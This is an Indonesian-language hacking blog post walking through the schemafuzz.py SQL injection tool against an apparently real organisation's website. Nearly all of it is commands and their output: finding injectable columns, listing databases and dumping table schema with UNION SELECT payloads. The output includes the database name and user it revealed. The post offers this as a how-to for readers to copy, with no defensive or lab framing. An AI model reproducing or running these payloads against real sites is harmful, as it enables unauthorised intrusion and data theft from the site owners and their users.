Menggunakan schemafuzz.py
- Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
- Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
- CMD
Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...
- Cari target Misal: http://www.ditplb.or.id/profile.php?id=1
Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
- [+] URL: http://www.ditplb.or.id/profile.php?id=1--
- [+] Evasion Used: "+" "--"
- [+] 20:36:29
- [-] Proxy Not Given
- [+] Attempting To find the number of columns...
- [+] Testing: 0,1,2,
- [+] Column Length is: 3
- [+] Found null column at column #: 2
- [+] SQLi URL:
- http://www.ditplb.or.id/profile.php?...SELECT+0,1,2--
- [+] darkc0de
- URL: http://www.ditplb.or.id/profile.php?...T+0,1,darkc0de
- [-] Done.!
- Cari database dg command --dbsMisal : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";--dbs
- [+] URL:
- http://www.ditplb.or.id/profile.php?...0,1,darkc0de--
- [+] Evasion Used: "+" "--"
- [+] 20:39:32
- [-] Proxy Not Given
- [+] Gathering MySQL Server Configuration...
- [+] Showing all databases current user has access too!
- [+] Number of Databases: 1
- [0] t15618_plb
- [-] 20:39:39
- [-] Total URL Requests 3
- [-] Done
- 4. Cari nama table dalam database Misal: schemafuzz.py -u"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";--schema -D namadatabase
- Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de ";--schema -D t15618_plb
- [+] URL:
- http://www.ditplb.or.id/profile.php?...0,1,darkc0de--.
- [+] Evasion Used: "+" "--".
- [+] 20:43:10.
- [-] Proxy Not Given.
- [+] Gathering MySQL Server Configuration....
- Database: t15618_plb.
- User: t15618_pl...@localhost.
xixixi
just share buat 
kyk saya
Sumber :Indonesia Hacker Team
0 komentar:
Posting Komentar